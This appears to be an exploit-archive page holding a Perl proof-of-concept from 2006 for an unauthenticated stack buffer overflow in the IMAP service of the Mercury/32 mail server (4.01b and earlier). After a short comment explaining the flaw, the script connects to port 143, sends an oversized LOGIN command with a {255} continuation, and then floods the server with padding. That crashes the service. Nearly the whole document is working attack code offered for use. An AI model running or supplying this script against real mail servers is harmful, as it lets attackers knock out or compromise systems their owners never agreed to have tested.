Mercury/32 Mail Server <= 4.01b (check) Buffer Overflow Exploit PoC

#!/usr/bin/perl # #&nbsp;mercurypown-v1.pl # #&nbsp;Mercury/32&nbsp;<v4.01b&nbsp;(win32)&nbsp;remote&nbsp;exploit #&nbsp;by&nbsp;mu-b&nbsp;-&nbsp;28&nbsp;Nov&nbsp;2006 # #&nbsp;-&nbsp;Tested&nbsp;on:&nbsp;Mercury/32&nbsp;v4.01a&nbsp;(win32) #&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Mercury/32&nbsp;v4.01b&nbsp;(win32) # #&nbsp;Stack-based&nbsp;buffer&nbsp;overflow&nbsp;caused&nbsp;by&nbsp;Mercury/32&nbsp;concatenating #&nbsp;continuation&nbsp;data&nbsp;into&nbsp;a&nbsp;fixed&nbsp;sized&nbsp;buffer&nbsp;disregarding #&nbsp;the&nbsp;length&nbsp;of&nbsp;the&nbsp;original&nbsp;command,&nbsp;you&nbsp;do&nbsp;not&nbsp;require&nbsp;authentication. # #&nbsp;This&nbsp;is&nbsp;a&nbsp;little&nbsp;harder&nbsp;to&nbsp;exploit&nbsp;than&nbsp;usual&nbsp;since&nbsp;the #&nbsp;stack&nbsp;frame&nbsp;in&nbsp;question&nbsp;calls&nbsp;end_thread&nbsp;before&nbsp;returning.. #&nbsp;buts&nbsp;it\'s&nbsp;still&nbsp;possible&nbsp;by&nbsp;at&nbsp;*least*&nbsp;two&nbsp;different&nbsp;ways... #&nbsp;(i.e.&nbsp;controlling&nbsp;a&nbsp;pointer&nbsp;into&nbsp;sprintf&nbsp;and/or&nbsp;controlling #&nbsp;&nbsp;a&nbsp;pointer&nbsp;to&nbsp;be&nbsp;free()). # ######## use&nbsp;Getopt::Std;&nbsp;getopts(\'t:n:\',&nbsp;\\%arg); use&nbsp;Socket; &print_header; my&nbsp;$target; if&nbsp;(defined($arg{\'t\'}))&nbsp;{&nbsp;$target&nbsp;=&nbsp;$arg{\'t\'}&nbsp;} if&nbsp;(!(defined($target)))&nbsp;{&nbsp;&usage;&nbsp;} my&nbsp;$imapd_port&nbsp;=&nbsp;143; my&nbsp;$send_delay&nbsp;=&nbsp;1; my&nbsp;$NOP&nbsp;=&nbsp;\'A\'; my&nbsp;$LEN&nbsp;=&nbsp;9200;#8928; my&nbsp;$BUFLEN&nbsp;=&nbsp;8192; if&nbsp;(connect_host($target,&nbsp;$imapd_port))&nbsp;{ &nbsp;&nbsp;&nbsp;&nbsp;print(\"->&nbsp;*&nbsp;Connected \"); &nbsp;&nbsp;&nbsp;&nbsp;$buf&nbsp;=&nbsp;\"1&nbsp;LOGIN\".(\"&nbsp;\"x($LEN-$BUFLEN)).\"{255} \"; &nbsp;&nbsp;&nbsp;&nbsp;send(SOCKET,&nbsp;$buf,&nbsp;0); &nbsp;&nbsp;&nbsp;&nbsp;sleep($send_delay); &nbsp;&nbsp;&nbsp;&nbsp;print(\"->&nbsp;*&nbsp;Sending&nbsp;payload \"); &nbsp;&nbsp;&nbsp;&nbsp;$buf&nbsp;=&nbsp;$NOP&nbsp;x&nbsp;255; &nbsp;&nbsp;&nbsp;&nbsp;send(SOCKET,&nbsp;$buf,&nbsp;0); &nbsp;&nbsp;&nbsp;&nbsp;sleep($send_delay); &nbsp;&nbsp;&nbsp;&nbsp;print(\"->&nbsp;*&nbsp;Sending&nbsp;payload&nbsp;2 \"); &nbsp;&nbsp;&nbsp;&nbsp;$buf&nbsp;=&nbsp;$NOP&nbsp;x&nbsp;$BUFLEN; &nbsp;&nbsp;&nbsp;&nbsp;send(SOCKET,&nbsp;$buf,&nbsp;0); &nbsp;&nbsp;&nbsp;&nbsp;sleep($send_delay); &nbsp;&nbsp;&nbsp;&nbsp;print(\"->&nbsp;*&nbsp;Successfully&nbsp;sent&nbsp;payload! \"); } sub&nbsp;print_header&nbsp;{ &nbsp;&nbsp;&nbsp;&nbsp;print(\"Mercury/32&nbsp;<v4.01b&nbsp;(win32)&nbsp;remote&nbsp;exploit \"); &nbsp;&nbsp;&nbsp;&nbsp;print(\"by:&nbsp;<mu-b@digit-labs.org> \"); } sub&nbsp;usage&nbsp;{ &nbsp;&nbsp;&nbsp;&nbsp;print(qq(Usage:&nbsp;$0&nbsp;-t&nbsp;<hostname> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;-t&nbsp;<hostname>&nbsp;&nbsp;&nbsp;&nbsp;:&nbsp;hostname&nbsp;to&nbsp;test )); &nbsp;&nbsp;&nbsp;&nbsp;exit(1); } sub&nbsp;connect_host&nbsp;{ &nbsp;&nbsp;&nbsp;&nbsp;($target,&nbsp;$port)&nbsp;=&nbsp;@_; &nbsp;&nbsp;&nbsp;&nbsp;$iaddr&nbsp;&nbsp;=&nbsp;inet_aton($target)&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;||&nbsp;die(\"Error:&nbsp;$! \"); &nbsp;&nbsp;&nbsp;&nbsp;$paddr&nbsp;&nbsp;=&nbsp;sockaddr_in($port,&nbsp;$iaddr)&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;||&nbsp;die(\"Error:&nbsp;$! \"); &nbsp;&nbsp;&nbsp;&nbsp;$proto&nbsp;&nbsp;=&nbsp;getprotobyname(\'tcp\')&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;||&nbsp;die(\"Error:&nbsp;$! \"); &nbsp;&nbsp;&nbsp;&nbsp;socket(SOCKET,&nbsp;PF_INET,&nbsp;SOCK_STREAM,&nbsp;$proto)&nbsp;||&nbsp;die(\"Error:&nbsp;$! \"); &nbsp;&nbsp;&nbsp;&nbsp;connect(SOCKET,&nbsp;$paddr)&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;||&nbsp;die(\"Error:&nbsp;$! \"); &nbsp;&nbsp;&nbsp;&nbsp;return(1337); } &nbsp;